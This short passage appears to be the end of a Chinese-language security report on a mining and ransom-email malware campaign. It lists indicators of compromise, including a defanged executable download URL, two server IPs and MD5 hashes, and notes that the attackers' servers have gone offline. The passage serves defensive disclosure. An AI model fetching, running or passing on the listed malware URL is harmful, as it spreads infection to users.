hxxp://thaus.to/8.exe … IP 193.32.161.77 193.32.161.69 MD5 ef7ffba4b98df751763464f404d3010c f895a1875b3e112df7e4d548b28b9927 1d843f799da25d93d370969e126c32fa 3e26d2428d90c95531b3f2e700bf0e4c 33e45f80f9cbfd841242e8bb4488def1 另据最新情况,该病毒的两个服务器均已关闭,包括病毒下载服务器和勒索邮件发送任务服务器。也意味着,现有已感染的病毒仅剩下挖矿部分工作正常,发送勒索邮件的任务必须等待所有病毒更新,攻击者找到新的控制服务器,重新完成配置。